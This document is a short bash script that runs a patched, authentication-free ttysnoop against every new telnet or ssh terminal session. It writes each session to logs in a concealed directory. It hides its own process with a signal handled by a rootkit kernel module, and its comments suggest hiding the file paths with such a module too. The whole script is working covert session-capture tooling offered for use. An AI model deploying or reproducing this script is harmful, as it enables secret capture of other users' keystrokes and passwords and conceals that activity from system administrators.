#!/bin/bash
####
# A simple shell script to work in conjunction with ttysnoop.
# This assumes you have a ttysnoop that does not require authentication,
# which is a quick hack to the source (grep for authenticate).  
# In a kludgy sort of way, it watches for a new connection (either via
# telnetd or sshd) which will place a new ttypX socket in the ttysnoop spool
# directory.  If a new one is noticed, a ttysnoop process is attached to
# it and logged accordingly.  
#
# If you have ideas for changes to this, I'd like to hear of them.
#
# warchild@spoofed.org
####
###
# BUGS: but of course!
###
# -32 is implemented by the synapsys LKM.  
# This process and all it's little children will be hidden.
# YMMV.
kill -32 $$
# change these to fit your setup.
# consider hiding these using a LKM of sorts
TTYSNOOP=/sbin/ttysnoop
SPOOL_DIR=/var/spool/ttysnoop
LOG_DIR=/var/.log/ttysnoop
while(true); do
	for tty in `ls $SPOOL_DIR`; do
	# name the logs in a identifying sorta way
	LOG_NAME=$tty-`ls -l $SPOOL_DIR/$tty | awk '{print $6"-"$7"-"$8}'`
	LOG=$LOG_DIR/$LOG_NAME
		# the logs should remain fairly unique.  		
		if [ ! -f $LOG ]; then
			nohup $TTYSNOOP $tty > $LOG 2>&1 &
		fi
	done
sleep 2
done